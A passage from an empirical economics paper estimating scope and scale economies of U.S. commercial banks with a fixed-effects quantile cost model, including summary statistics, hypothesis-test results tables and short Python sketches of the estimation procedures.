Following the literature, we define nonperforming assets as a sum of total loans and lease financing receivables past due 30 days or more and still accruing, total loans and lease financing receivables not accruing, other real estate owned, and charge-offs on past-due loans and leases. The loss provision is measured using the total provision for loan and lease losses.

Footnote 6: Although we denote these variables as "\(K\)," we do _not_ conceptualize them as quasi-fixed input quantities analogous to \(K_{1}\).

We exclude observations that have negative/missing values for assets, equity, output quantities and input prices, which are likely the result of erroneous data reporting. This leaves us with an operational sample of 44,704 observations for 7,232 banks. We deflate all nominal variables to 2005 U.S. dollars using the consumer price index. Table 1 provides summary statistics for our main variables.

\begin{table}
\begin{tabular}{l r r r r} \hline\hline
Variables & Mean & 1st Qu. & Median & 3rd Qu. \\ \hline
\(C\) & 13,602.44 & 2,344.10 & 4,612.10 & 10,066.33 \\
\(Y_{1}\) & 424,480.49 & 55,819.58 & 114,898.89 & 265,677.61 \\
\(Y_{2}\) & 118,621.10 & 13,161.49 & 31,803.01 & 77,360.61 \\
\(Y_{3}\) & 27,304.00 & 659.78 & 2,847.73 & 10,503.06 \\
\(W_{1}\) & 50.79 & 14.83 & 21.27 & 33.85 \\
\(W_{2}\) & 57.86 & 47.00 & 54.34 & 64.90 \\
\(W_{3}\) & 0.82 & 0.40 & 0.66 & 1.09 \\
\(K_{1}\) & 70,383.27 & 9,433.85 & 18,382.47 & 40,467.85 \\
\(K_{2}\) & 0.03 & 0.01 & 0.02 & 0.04 \\
\(K_{3}\) & 1.04 & 0.01 & 0.08 & 0.31 \\ \hline\hline
\end{tabular}
Notes: \(C\) – total variable costs; \(Y_{1}\) – total loans; \(Y_{2}\) – total securities; \(Y_{3}\) – off-balance sheet output measured using credit equivalents; \(W_{1}\) – price of physical capital; \(W_{2}\) – price of labor; \(W_{3}\) – price of financial capital; \(K_{1}\) – total equity; \(K_{2}\) – the ratio of nonperforming assets to total assets; \(K_{3}\) – the ratio of loan loss provisions to total assets. Variables \(C\), \(W_{1}\), \(W_{2}\), \(Y_{1}\), \(Y_{2}\), \(Y_{3}\), and \(K_{1}\) are in thousands of real 2005 USD. Variables \(W_{3}\), \(K_{2}\) and \(K_{3}\) are in \%.
\end{table}
Table 1: Data Summary Statistics

Given our emphasis on accounting for banks' off-balance sheet operations, of particular interest is the nontraditional output. Although descriptive statistics in Table 1 expectedly indicate that the volume of \(Y_{3}\) is significantly smaller than that of the two other traditional outputs, banks' involvement in these off-balance sheet activities has, in fact, been steadily expanding in recent years. To show this, we plot the average share of off-balance sheet activities in the bank's total output \(Y_{3}/(Y_{1}+Y_{2}+Y_{3})\) in Figure 1(a), from where it is evident that the average share of nontraditional outputs among U.S. commercial banks has been steadily increasing since 2011, almost doubling from about 2% in 2009 to 3.7% in 2018. This is consistent with the narrative that commercial banks in the U.S. are increasingly shifting towards off-balance sheet banking. Obviously, the level of involvement in such nontraditional activities varies considerably across banks, and the rather modest _average_ share of the off-balance sheet activities plotted in Figure 1(a) does not provide a complete picture of the growing prevalence of nontraditional activities in banks' operations because it conceals the well-documented heterogeneity across individual banks.
For instance, some banks in our sample are highly specialized in off-balance sheet activities, which account for about 70% of their outputs. Therefore, we also examine the evolution of the off-balance sheet share in banks' output portfolio at different quantiles in the data, with a particular focus on the upper tail of the distribution. Figure 1(b) plots select upper quantiles of \(Y_{3}/(Y_{1}+Y_{2}+Y_{3})\) over the years, with the lines from bottom to top corresponding to the median, 0.75th, 0.90th, 0.99th and 0.995th quantiles.

Figure 1: Output Share of Off-Balance Sheet Activities over Time, in %: (a) average, (b) select quantiles

Two observations are in order here. First, owing to the positive skew in the off-balance sheet share distribution, the differences in banks' involvement in nontraditional banking are stark, with the output share ranging from about 1.8% at the median to 19.5% for banks at the top 0.995th quantile. This cross-bank heterogeneity is expected as the choice to engage in nontraditional operations is associated with various idiosyncratic characteristics of banks, including their asset size (Rogers and Sinkey Jr, 1999). Second, the rising share of off-balance sheet activities is present across just about its entire distribution. The latter is particularly evident in Figure 2 that plots this distribution at the beginning (2009) and the end (2018) of our sample period. Altogether, these data document the rising and heterogeneous level of involvement in nontraditional off-balance sheet activities by U.S. banks in the post-crisis period, not only corroborating the common argument that off-balance sheet activities ought to be accounted for in the analysis of banks but also illustrating the importance of adequately accommodating vast heterogeneity across banks in that analysis. We seek to address both these imperatives in our paper.

Figure 2: Distribution of the Output Share of Off-Balance Sheet Activities in 2009 vs. 2018

## 5 Empirical Results

This section reports the results based on our time-varying-coefficient fixed-effects quantile model of bank cost that explicitly accommodates three-way heterogeneity across banks: (_i_) distributional heterogeneity, (_ii_) cross-time heterogeneity and (_iii_) unobserved bank heterogeneity. Although our analysis is at different quantiles of the bank's _cost_, the interpretation of distributional heterogeneity can be generalized and extended to bank _size_ because the bank's operation cost is a good proxy for its size/scale. To sufficiently capture distributional heterogeneity across banks, we estimate our model for the 0.10th, 0.25th, 0.50th, 0.75th and 0.90th quantiles. The middle three quantiles shed light on the cost structure of mid-size banks in the interquartile range of the conditional log-cost distribution, whereas the more extreme 0.10th and 0.90th quantiles provide evidence for the smaller and larger banks, respectively. For inference, we use the 95% bias-corrected bootstrap percentile confidence intervals: one- or two-sided, as appropriate. In what follows, we discuss our main empirical results pertaining to scope economies. We then supplement that discussion by also considering two other sources of potential cost savings in banking, namely, scale economies and technological progress.

### Scope Economies

As discussed in Section 2, we investigate the presence of scope economies by using the expansion-path measure of cost subadditivity.
Since we analyze bank cost structure across the entire cost distribution as opposed to its first moment (i.e., conditional mean), our cost subadditivity measure is not only observation- but also cost-quantile-specific. When evaluating the formulae in (2.4)-(2.5), we replace \(\mathcal{C}_{t}(\cdot)\) with the exponentiated quantile function of the log-cost \(\mathcal{Q}_{c}(\tau|\cdot)\) since our cost function estimation is for a conditional log-quantile. That is, for a given quantile \(\tau\), we compute the cost subadditivity measure as

\[\mathcal{S}_{t}(\tau)=\frac{\sum_{\kappa}\exp\left[\mathcal{Q}_{c}\left(\tau|\varpi_{1}^{\kappa}Y_{1}^{*}+\min\{Y_{1}\},\varpi_{2}^{\kappa}Y_{2}^{*}+\min\{Y_{2}\},\varpi_{3}^{\kappa}Y_{3}^{*}+\min\{Y_{3}\},t\right)\right]-\exp\left[\mathcal{Q}_{c}\left(\tau|Y_{1},Y_{2},Y_{3},t\right)\right]}{\exp\left[\mathcal{Q}_{c}\left(\tau|Y_{1},Y_{2},Y_{3},t\right)\right]}. \tag{5.1}\]

It is noteworthy that our use of quantiles offers another advantage over the more traditional conditional-mean models whereby, owing to a "monotone equivariance property" of quantiles, our estimates of \(\mathcal{S}_{t}(\tau)\), which are based on the _level_ of cost, are immune to transformation biases due to exponentiation of the estimated _log_-cost function. The same however cannot be said about the estimates of scope economies in analogous conditional-mean analyses. Specifically, to evaluate scope economies, most studies typically exponentiate the predicted _logarithm_ of bank cost from the estimated translog conditional-mean regressions while ignoring Jensen's inequality. Consequently, their scope economies estimates are likely biased. To see this, let the conventional fixed-coefficient translog cost regression be \(c=f(\mathbf{v})+\epsilon\) with \(\mathbb{E}[\epsilon|\mathbf{v}]=0\), and recall that upper/lower-case variables are in levels/logs. It then trivially follows that \(\mathbb{E}[C|\mathbf{v}]=\exp\{f(\mathbf{v})\}\mathbb{E}[\exp\{\epsilon\}|\mathbf{v}]\), which generally diverges from \(\exp\{f(\mathbf{v})\}\) by a multiplicative function of \(\mathbf{v}\). Since cost counterfactuals in \(\mathcal{S}_{t}(\tau)\) admit different "\(\mathbf{v}\)" values as arguments, the cost subadditivity measure above will normally be biased and need not have the same magnitude or even sign as the true quantity unless \(\exp\{\epsilon\}\) is mean-independent of \(\mathbf{v}\), which is unlikely to be true in practice, say, if \(\epsilon\) is heteroskedastic. In the case of quantile estimation, we however do _not_ face such a problem owing to the equivariance of quantiles to monotone transformations, viz. \(\mathcal{Q}_{C}[\tau|\mathbf{v}]=\mathcal{Q}_{\exp\{c\}}[\tau|\mathbf{v}]=\exp\{\mathcal{Q}_{c}[\tau|\mathbf{v}]\}\) (e.g., see Koenker, 2005).

Now, recall that \(\mathcal{S}_{t}(\tau)\) depends on the choice of \(\{\varpi_{m}^{\kappa}\}\), which we circumvent by choosing weights that yield the smallest cost subadditivity measure for a given cost quantile \(\tau\) in the admissible region: \(\mathcal{S}_{t}^{*}(\tau)\). Namely, for each fixed cost quantile of interest, we perform a grid search over the permissible range of weights in \([0,1]^{6}\) at 0.1 increments. We do this for each bank in a given year (a minimal computational sketch of this search is given below). Table 2 summarizes such point estimates of \(\mathcal{S}_{t}^{*}(\tau)\) for different quantiles of the conditional cost distribution.
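To fix ideas, here is a minimal brute-force sketch (ours) of the weight grid search described above. The function `cost_quantile` is a hypothetical placeholder for the estimated exponentiated conditional quantile cost function \(\exp[\mathcal{Q}_{c}(\tau|\cdot,t)]\) evaluated at a counterfactual output bundle (holding prices and quasi-fixed inputs at the bank's observed values), and the ratio checks mimic the admissible region in the spirit of (2.3); this is not the paper's production code.

```python
import itertools
import numpy as np

def min_subadditivity(y, y_min, ratio_lo, ratio_hi, cost_quantile, step=0.1):
    """Smallest admissible cost subadditivity S*_t(tau) for one bank-year, per (2.4)-(2.5).

    y             : (3,) observed outputs (Y1, Y2, Y3) of the bank
    y_min         : (3,) sample minima of each output (assumed strictly positive)
    ratio_lo/hi   : (3, 3) sample min/max of the output ratios Y_m / Y_m'
    cost_quantile : callable returning exp[Q_c(tau | outputs, t)] for an output vector;
                    hypothetical stand-in for the estimated quantile cost function
    """
    y, y_min = np.asarray(y, float), np.asarray(y_min, float)
    y_star = y - 3.0 * y_min                  # Y*_m = Y_m - 3*min{Y_m}; assumed nonnegative here
    grid = np.arange(0.0, 1.0 + 1e-9, step)  # 0.1-increment grid on [0, 1]
    c_joint = cost_quantile(y)                # cost of the larger, diversified bank

    def admissible(yk):
        # counterfactual specialization must stay within the sample range of output ratios
        for m in range(3):
            for mp in range(3):
                if m != mp:
                    r = yk[m] / yk[mp]
                    if r < ratio_lo[m, mp] or r > ratio_hi[m, mp]:
                        return False
        return True

    best = np.inf
    for wA in itertools.product(grid, repeat=3):      # weights of counterfactual bank A
        for wB in itertools.product(grid, repeat=3):  # weights of counterfactual bank B
            wC = 1.0 - np.asarray(wA) - np.asarray(wB)  # adding-up: sum_k w_m^k = 1
            if (wC < -1e-9).any():
                continue
            banks = [np.asarray(w) * y_star + y_min for w in (wA, wB, wC)]
            if not all(admissible(b) for b in banks):
                continue
            total = sum(cost_quantile(b) for b in banks)
            best = min(best, (total - c_joint) / c_joint)
    return best   # np.inf if no weight combination is admissible
```

Under this sketch, the search is simply repeated for every bank-year and for each cost quantile \(\tau\) considered.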
(We caution readers against confusing quantiles of the conditional cost distribution \(\tau\), for which our bank cost function and the cost subadditivity measure are estimated, with the quantiles of empirical distribution of observation-specific \(\mathcal{S}_{t}^{*}(\tau)\) estimates corresponding to a given \(\tau\).) The two hypotheses of particular interest here are \((i)\)\(\mathbb{H}_{0}:\mathcal{S}_{t}^{*}(\tau)\leq 0\) v. \(\mathbb{H}_{1}:\mathcal{S}_{t}^{*}(\tau)>0\) and \((ii)\)\(\mathbb{H}_{0}:\) \(\mathcal{S}_{t}^{*}(\tau)=0\) v. \(\mathbb{H}_{1}:\mathcal{S}_{t}^{*}(\tau)\neq 0\). Both tests are essentially the same, except for the one- or two-sided alternatives. Although the \((i,t)\) index on outputs is suppressed in (5.1), the tests are at the level of observation (bank-year). In case of \((i)\), rejection of the null would imply that even the smallest subadditivity measure is statistically _positive_ and scope economies can thus be inferred to also be locally significant over the bank's output space in a given year. In case of \((ii)\), failure to reject the null would suggest that subadditivity measure is statistically indistinguishable from zero, which is consistent with the bank's cost structure exhibiting local scope invariance. The right panel of Table 2 reports the results of these hypothesis tests. Namely, for each cost quantile \(\tau\), we classify banks in our data based on the two dichotomous groups of categories: banks that exhibit scope economies \([\mathcal{S}_{t}^{*}(\tau)>0]\) vs. scope non-economies \([\mathcal{S}_{t}^{*}(\tau)\leq 0]\) and the banks whose cost structure that exhibits scope invariance \([\mathcal{S}_{t}^{*}(\tau)=0]\) vs. scope non-invariance \([\mathcal{S}_{t}^{*}(\tau)\neq 0]\). Our results provide strong evidence in support of statistically significant scope economies across banks virtually of all sizes in the U.S. banking sector. For banks in the middle interquartile range of the cost--essentially, size--distribution, at least 95.7% exhibit positive economies of scope. For the top half of the distribution (median or higher), the prevalence of significant scope economies is about 99%. Even at the very bottom of cost distribution (\(\tau=0.1\)) where the revenue diversification opportunities may not be as abundant or easily accessible, our test results suggest that roughly 92% of banks enjoy scope-driven cost savings and those, who do not, exhibit scope invariance. Figure 3 provides a graphic illustration of these results. For each considered cost quantile \(\tau\), the figure shows a scatter-plot of the \(\mathcal{S}_{t}^{*}(\tau)\) estimates for each bank-year observation along with the corresponding one-sided 95% lower confidence bound. Here, we sort these estimates by their lower confidence bounds (solid line) and color them based on whether they are significantly above 0 or not. From Figure 3, it is evident that positive scope economies are ubiquitous and that their presence is only growing with quantiles of the conditional variable-cost distribution of banks (i.e., with the bank size). \begin{table} \begin{tabular}{l c c c c|c c c|c c} \hline \hline Cost & \multicolumn{4}{c|}{_Point Estimates_} & \multicolumn{4}{c}{_Inference Categories_} \\ Quantiles (\(\tau\)) & Mean & 1st Qu. & Median & 3rd Qu. 
& \(=\mathbf{0}\) & \(\neq\mathbf{0}\) & \(>\mathbf{0}\) & \(\leq 0\) \\ \hline \(\mathcal{Q}(0.10)\) & 0.138 & 0.078 & 0.125 & 0.181 & **9.76\%** & 90.24\% & **92.04\%** & 7.96\% \\ & (0.058, 0.469) & (0.023, 0.288) & (0.048, 0.463) & (0.082, 0.626) & & & & \\ \(\mathcal{Q}(0.25)\) & 0.175 & 0.107 & 0.163 & 0.225 & **5.48\%** & 94.52\% & **95.70\%** & 4.30\% \\ & (0.078, 0.598) & (0.036, 0.361) & (0.067, 0.579) & (0.106, 0.777) & & & & \\ \(\mathcal{Q}(0.50)\) & 0.264 & 0.175 & 0.258 & 0.335 & **1.40\%** & 98.60\% & **98.90\%** & 1.10\% \\ & (0.120, 0.937) & (0.066, 0.549) & (0.109, 0.873) & (0.155, 1.185) & & & & \\ \(\mathcal{Q}(0.75)\) & 0.388 & 0.259 & 0.394 & 0.496 & **0.45\%** & 99.55\% & **99.50\%** & 0.50\% \\ & (0.194, 1.205) & (0.103, 0.683) & (0.169, 1.113) & (0.242, 1.582) & & & & \\ \(\mathcal{Q}(0.90)\) & 0.459 & 0.313 & 0.476 & 0.575 & **0.30\%** & 99.70\% & **99.60\%** & 0.40\% \\ & (0.261, 1.164) & (0.121, 0.671) & (0.231, 1.036) & (0.356, 1.567) & & & & \\ \hline \hline \end{tabular} The left panel summarizes point estimates of \(\mathcal{S}_{t}^{*}(\tau)\) with the corresponding two-sided 95% bias-corrected confidence intervals in parentheses. Each bank-year is classified as exhibiting scope economies \([\mathcal{S}_{t}^{*}(\tau)>0]\) vs. non-economies \([\mathcal{S}_{t}^{*}(\tau)\leq 0]\) and scope invariance \([\mathcal{S}_{t}^{*}(\tau)=0]\) vs. scope non-invariance \([\mathcal{S}_{t}^{*}(\tau)\neq 0]\) using the corresponding one- and two-sided 95% bias-corrected confidence bounds, respectively. The right panel reports sample shares for each category and for its corresponding negating alternative. Percentage points sum up to a hundred within binary groups only. \end{table} Table 2: Cost Subadditivity Estimates Figure 3: The One-Sided 95% Lower Bounds (solid lines) of the Cost Subadditivity Point Estimates (scatter points) Across Cost Quantiles As a robustness check, we re-estimate our model under alternative empirical specifications of the cost-function variables. Namely, we consider a different proxy for nontraditional operations used in the literature (net non-interest income) as well as assess sensitivity of our findings to credit risk proxies included in the analysis. Table 3 summarizes estimates of cost subadditivity across these alternatives. Two observations are in order here. First, omitting an _ex-ante_ proxy for output quality (loan loss provisions) produces uniformly larger point estimates of cost subadditivity. Consequently, the evidence in favor of significantly positive scope economies is even stronger in the latter case. Nonetheless, we continue to include this important control in our main specification. Second, when using net non-interest income as a proxy measure of nontraditional banking operations, we obtain smaller \(\mathcal{S}_{t}^{*}(\tau)\) estimates, with the largest differences seen at the bottom tail of costs. But even then, the empirical evidence in support of scope economies across banks is strong. For banks in the middle of the cost distribution (at the conditional median), 89% exhibit significant economies of scope. The prevalence of product-scope-driven cost savings is even more pervasive (\(\geq 97.6\%\)) for larger banks at higher quantiles. In the case of smaller-scale banks at the bottom 0.10th and 0.25th quantiles, the share of banks that enjoy scope economies--while smaller--is nonetheless non-negligible, ranging between 41-65% and 59-82%, respectively, depending on the credit risk proxies included in the analysis. 
The cost structure of the remaining banks is scope-invariant. All in all, our findings of significant scope economies in banking are robust to alternative specifications, and in what follows, we therefore focus on the results from our main specification only.

A finding worth emphasizing here is that, having accounted for three-way heterogeneity across banks in a pursuit of robust estimates of bank cost subadditivity, we find _no_ empirical evidence in support of scope _dis_economies. This is in stark contrast with earlier studies of scope economies in U.S. banking (e.g., Berger et al., 1987; Mester, 1987; Hughes and Mester, 1993; Pulley and Braunstein, 1992; Ferrier et al., 1993; Pulley and Humphrey, 1993; Jagtiani et al., 1995; Jagtiani and Khanthavit, 1996; Wheelock and Wilson, 2001). Besides our reliance on the more robust estimation methodology, the qualitative differences between our and prior findings can also be attributed to fundamental changes that the banking sector has undergone in the past two decades, characterized by the growing importance of nontraditional banking operations propelled by financial product innovations.

Although the subadditivity measure does not directly quantify the _magnitude_ of scope economies in the conventional interpretation of the latter, the value of its point estimates can still provide useful insights into the diversification-driven cost savings. Recall that \(\mathcal{S}_{t}^{*}(\tau)\) compares the cumulative cost of multiple smaller banks of higher degrees of _relative_ output specialization with the cost of a larger, more relatively diversified bank. Essentially, the subadditivity measure sheds light on scope economies from a perspective of relative--as opposed to absolute--notion of revenue diversification. What is measured is the reduction in bank cost (in proportions) afforded by achieving lower specialization in any one output. From the left panel of Table 2, the mean estimates of cost subadditivity range from 0.138 to 0.459 depending on the conditional cost quantile. This suggests, on average, the potential for a 14-46% cost saving if the bank "rebalances" its joint production of loans, securities and off-balance sheet outputs. We also find that the magnitude of diversification-driven economies increases as one moves from the bottom to the top of the bank cost distribution, thereby suggesting that larger banks (higher \(\tau\)) may economize cost better compared to those of smaller size in the lower end of the cost distribution.

Figure 4: Kernel Densities of Cost Subadditivity Estimates Across Cost Quantiles

For a more holistic look at the empirical evidence of scope economies across different quantiles of the bank cost distribution, we also provide kernel density plots of the \(\mathcal{S}_{t}^{*}(\tau)\) estimates in Figure 4. It enables us to compare distributions of the cost subadditivity estimates as opposed to merely focusing on marginal moments. Consistent with our earlier discussion, these plots indicate that large-scale banks lying in the upper quantiles of the cost distribution appear to enjoy bigger diversification-driven cost economies than those in the lower cost quantiles. To support this visual evidence, we formally test for the (first-order) stochastic dominance of scope economies exhibited by banks in the top cost quantiles over those exhibited by banks in the bottom quantiles. We utilize a generalized Kolmogorov-Smirnov test proposed by Linton et al. (2005).
The test permits dominance comparisons over multiple variables (in our case, more than two cost quantiles) and allows these variables to be estimated latent quantities, as opposed to observables from the data, that may also share dependence (in our case, the dependence is due to common parameter estimates used to construct quantile coefficients). Specifically, let \(F_{\tau}(\mathcal{S})\) represent the cumulative distribution function of the \(\mathcal{S}_{t}^{*}(\tau)\) estimates for a given cost quantile \(\tau\). We then form the null hypotheses that diversification-driven scope economies exhibited by banks in the lower quantiles of the cost distribution are stochastically dominated by those in the upper quantiles of the cost distribution. More formally, for any cost quantile of interest \(\overline{\tau}\in\mathbb{T}\) with \(\mathbb{T}=\{0.10,0.25,0.50,0.75,0.90\}\), we are interested in

\[\mathbb{H}_{0}\colon\min_{\tau\neq\overline{\tau}\in\mathbb{T}}\sup_{\mathcal{S}\in\mathbb{S}}\left[F_{\tau}(\mathcal{S})-F_{\overline{\tau}}(\mathcal{S})\right]\leq 0\ \text{ v. }\ \mathbb{H}_{1}\colon\min_{\tau\neq\overline{\tau}\in\mathbb{T}}\sup_{\mathcal{S}\in\mathbb{S}}\left[F_{\tau}(\mathcal{S})-F_{\overline{\tau}}(\mathcal{S})\right]>0.\]

We use the sub-sampling procedure suggested by Linton et al. (2005) to perform the test.7

Footnote 7: We employ 199 equidistant sub-sample sizes \(B_{n}=\{b_{1},\ldots,b_{199}\}\), where \(b_{1}=[\log\log N]\), \(b_{199}=[N/\log\log N]\) with \(N=nT\) being the sample size. For each sub-sample size, we get a \(p\)-value. Reported is the mean of these 199 \(p\)-values.

\begin{table}
\begin{tabular}{l c c c c} \hline\hline
 & \(\{\mathcal{Q}(0.75),\ldots,\mathcal{Q}(0.10)\}\) & \(\{\mathcal{Q}(0.50),\mathcal{Q}(0.25),\mathcal{Q}(0.10)\}\) & \(\{\mathcal{Q}(0.25),\mathcal{Q}(0.10)\}\) & \(\mathcal{Q}(0.10)\) \\ \hline
\(\mathcal{Q}(0.90)\) & 0.578 & 0.578 & 0.739 & 0.970 \\
\(\mathcal{Q}(0.75)\) & & 0.894 & 0.970 & 0.970 \\
\(\mathcal{Q}(0.50)\) & & & 0.970 & 0.970 \\
\(\mathcal{Q}(0.25)\) & & & & 0.784 \\ \hline\hline
\end{tabular}
Notes: Reported are the \(p\)-values.
\end{table}
Table 4: Stochastic Dominance of Scope Subadditivity Across Cost Quantiles

Table 4 reports \(p\)-values for the tests of dominance of \(\mathcal{S}_{t}^{*}(\tau)\) from the "row" quantile over a multi-quantile set of \(\mathcal{S}_{t}^{*}(\tau)\) from the "column" quantiles. All \(p\)-values are safely greater than the conventional 0.05 level, and we fail to reject the nulls. Combined with the visual evidence from Figure 4, we can therefore infer that bigger banks in the higher quantiles of the cost distribution exhibit larger scope economies than do smaller banks from the lower cost quantiles for the entire set of observable output mixes.
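For intuition only, below is a highly simplified sketch (ours) of such a sub-sampling dominance test. It treats the \(\mathcal{S}_{t}^{*}(\tau)\) estimates as independent draws and uses a single sub-sample size, whereas the actual Linton et al. (2005) procedure accounts for their estimation-induced dependence and, as noted in Footnote 7, averages \(p\)-values over 199 sub-sample sizes. Function and variable names are illustrative.

```python
import numpy as np

def dominance_stat(samples, ref):
    """min over non-reference groups of sup_s [F_group(s) - F_ref(s)].

    samples : dict mapping a cost-quantile label -> 1-D array of S*_t(tau) estimates
    ref     : label of the reference (upper) cost quantile, tau-bar
    """
    grid = np.sort(np.concatenate(list(samples.values())))
    F = {k: np.searchsorted(np.sort(v), grid, side="right") / len(v)
         for k, v in samples.items()}                       # empirical CDFs on a common grid
    return min(np.max(F[k] - F[ref]) for k in samples if k != ref)

def subsample_pvalue(samples, ref, b, n_sub=500, seed=0):
    """Crude sub-sampling p-value for H0: statistic <= 0, using one sub-sample size b."""
    rng = np.random.default_rng(seed)
    n = min(len(v) for v in samples.values())
    t_full = np.sqrt(n) * dominance_stat(samples, ref)      # scaled full-sample statistic
    t_sub = np.empty(n_sub)
    for j in range(n_sub):
        sub = {k: rng.choice(v, size=b, replace=False) for k, v in samples.items()}
        t_sub[j] = np.sqrt(b) * dominance_stat(sub, ref)
    return float(np.mean(t_sub >= t_full))                  # share of sub-sample statistics >= full one
```

For example, `subsample_pvalue({"q90": s90, "q10": s10}, ref="q90", b=500)` would compare hypothetical arrays `s90` and `s10` of subadditivity estimates from the top and bottom cost quantiles.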
Relatedly, of interest is the relation between the magnitude of scope economies and the degree of the bank's specialization in nontraditional products. To examine this, for each cost quantile \(\tau\) that we consider in our analysis, we run a least-absolute-deviation regression of the \(\mathcal{S}_{t}^{*}(\tau)\) estimates on the share of off-balance sheet activities in the bank's total output \(Y_{3}/(Y_{1}+Y_{2}+Y_{3})\). Their median _associations_ are all significant and monotonically increasing with the cost quantile: \(-0.31\), \(-0.29\), \(-0.09\), \(0.35\) and \(0.41\) for \(\tau=0.10,0.25,0.50,0.75,0.90\), respectively. This suggests that, among larger banks (higher \(\tau\)), those who engage in off-balance sheet banking more heavily tend to enjoy scope economies of greater degrees. In contrast, for smaller banks (lower \(\tau\)), pivoting off balance sheet is associated with reduced scope-driven cost savings, plausibly because of their limited capabilities to capitalize on cross-output spillovers and input complementarities at smaller operations scales.

Lastly, we take a look at the evolution of scope economies. Figure 5 documents how distributions of the cost subadditivity estimates shifted over time. Plotted are the box-plots of \(\mathcal{S}_{t}^{*}(\tau)\) across the five considered cost quantiles \(\tau\) for each year \(t\). The data suggest a divergence in the degree of cost subadditivity between smaller (lower cost quantiles) and larger (higher cost quantiles) banks over time which, however, started reverting in the last years of the sample. We further observe that, while positive and significant throughout, the magnitude of the cost-saving potential associated with the product-scope diversification peaked around 2013-2014 and has since been in a steady decline, across all cost quantiles.

Figure 5: Evolution of Cost Subadditivity

### Scale Economies

We complement our analysis of the scope-driven cost savings in U.S. banking with the examination of economies of scale. Scale economies are said to exist if the bank's average cost declines with an equiproportional expansion of its outputs (i.e., with the increase in the scale of production). As discussed in the introduction, the latter has been a subject of particular academic interest in the face of the post-crisis regulatory reforms in the banking sector. Our returns to scale measure takes into account quasi-fixity of the equity input per Caves et al. (1981):

\[\mathcal{R}_{t}(\tau)=\big(1-\partial\mathcal{Q}_{c}(\tau|\cdot)/\partial k_{1}\big)\Big/\sum_{m}\partial\mathcal{Q}_{c}(\tau|\cdot)/\partial y_{m}, \tag{5.2}\]

where we replaced the usual \(\log\mathcal{C}_{t}(\cdot)\) with the quantile function of the log-cost \(\mathcal{Q}_{c}(\tau|\cdot)\) in the formula since our cost function estimation is for a conditional quantile. The measure of returns to scale is therefore both observation- and cost-quantile-specific (see the computational sketch below). Just like in the case of scope economies, for a given \(\tau\), we are mainly interested in the following two hypotheses: (_i_) \(\mathbb{H}_{0}:\mathcal{R}_{t}(\tau)\leq 1\) v. \(\mathbb{H}_{1}:\mathcal{R}_{t}(\tau)>1\) and (_ii_) \(\mathbb{H}_{0}:\mathcal{R}_{t}(\tau)=1\) v. \(\mathbb{H}_{1}:\mathcal{R}_{t}(\tau)\neq 1\). In case of (_i_), rejection of the null would imply that the returns to scale statistically _exceed_ 1, implying increasing returns (IRS) and, thus, significant scale economies. In case of (_ii_), failure to reject the null would suggest that returns to scale are statistically indistinguishable from 1, which is consistent with the bank exhibiting constant returns to scale (CRS) and, hence, scale invariance of costs. Table 5 summarizes point estimates of the returns to scale for all estimated quantiles of the conditional cost distribution of banks. The right panel of the table reports the results of the hypothesis tests. Namely, reported is the breakdown of banks that exhibit IRS (scale economies) vs. non-IRS (scale non-economies) and of banks that exhibit CRS (scale invariance) vs. non-CRS (scale non-invariance).
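As a minimal sketch (ours) of how (5.2) can be evaluated from the estimated quantile translog coefficients in (3.4), the snippet below computes the log-cost gradient analytically; the names and index bookkeeping are illustrative rather than the paper's actual code.

```python
import numpy as np

def returns_to_scale(v, idx_y, idx_k1, alpha1, alpha2):
    """Quantile-specific returns to scale per (5.2), evaluated at one observation.

    v      : (p,) vector of log regressors (log outputs, log prices, log quasi-fixed inputs)
    idx_y  : indices of the log outputs y_1, y_2, y_3 within v
    idx_k1 : index of log equity k_1 within v
    alpha1 : (p,) first-order translog quantile coefficients for the chosen tau and year
    alpha2 : (p, p) symmetric matrix of second-order coefficients for the chosen tau and year
    """
    v = np.asarray(v, float)
    # gradient of alpha0 + alpha1'v + 0.5 * v' alpha2 v  with respect to v
    grad = np.asarray(alpha1, float) + np.asarray(alpha2, float) @ v
    scale_elasticity = grad[list(idx_y)].sum()   # sum_m dQ_c/dy_m
    k1_elasticity = grad[idx_k1]                 # dQ_c/dk_1
    return (1.0 - k1_elasticity) / scale_elasticity
```

Evaluating this at every observation and cost quantile yields the observation- and quantile-specific estimates of the kind summarized in Table 5.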
The results in Table 5 provide overwhelming evidence of ubiquitous scale economies in the banking sector, across all cost quantiles. The average point estimates of returns to scale range from \(1.30\) to \(1.43\), with banks from the higher quantiles of the cost distribution exhibiting increasing returns to scale of larger magnitudes compared to those from the lower quantiles. We find that almost every single bank in our sample exhibits statistically significant scale economies (IRS). These results suggest that, when the bank radially expands the scale of its operation, its average variable cost decreases. These findings are consistent with the prior results which, however, are almost exclusively based on the analyses of bank costs at the conditional _mean_ (e.g., Wheelock and Wilson, 2012; Hughes and Mester, 2013; Restrepo-Tobon and Kumbhakar, 2015; Malikov et al., 2015; Restrepo-Tobon et al., 2015; Wheelock and Wilson, 2018). Given that we find evidence of significant scale economies along the entire cost _distribution_, our results provide robust assurance to these earlier findings reported in the literature.

\begin{table}
\begin{tabular}{l r r r r|r r r r} \hline\hline
Cost & \multicolumn{4}{c|}{_Point Estimates_} & \multicolumn{4}{c}{_Inference Categories, \%_} \\
Quantiles (\(\tau\)) & Mean & 1st Qu. & Median & 3rd Qu. & \(=1\) & \(\neq 1\) & \(>1\) & \(\leq 1\) \\ \hline
\(\mathcal{Q}(0.10)\) & 1.300 & 1.263 & 1.293 & 1.328 & **0.02** & 99.98 & **99.99** & 0.01 \\
 & (1.263, 1.352) & (1.226, 1.316) & (1.257, 1.344) & (1.286, 1.382) & & & & \\
\(\mathcal{Q}(0.25)\) & 1.321 & 1.282 & 1.313 & 1.351 & **0.01** & 99.99 & **100.0** & 0.00 \\
 & (1.282, 1.363) & (1.243, 1.322) & (1.276, 1.354) & (1.306, 1.399) & & & & \\
\(\mathcal{Q}(0.50)\) & 1.361 & 1.316 & 1.351 & 1.394 & **0.01** & 99.99 & **100.0** & 0.00 \\
 & (1.319, 1.404) & (1.276, 1.356) & (1.31, 1.393) & (1.347, 1.444) & & & & \\
\(\mathcal{Q}(0.75)\) & 1.405 & 1.352 & 1.392 & 1.441 & **0.00** & 100.0 & **100.0** & 0.00 \\
 & (1.352, 1.457) & (1.307, 1.398) & (1.344, 1.443) & (1.385, 1.500) & & & & \\
\(\mathcal{Q}(0.90)\) & 1.430 & 1.373 & 1.416 & 1.469 & **0.01** & 99.99 & **100.0** & 0.00 \\
 & (1.363, 1.491) & (1.314, 1.421) & (1.353, 1.469) & (1.397, 1.533) & & & & \\ \hline\hline
\end{tabular}
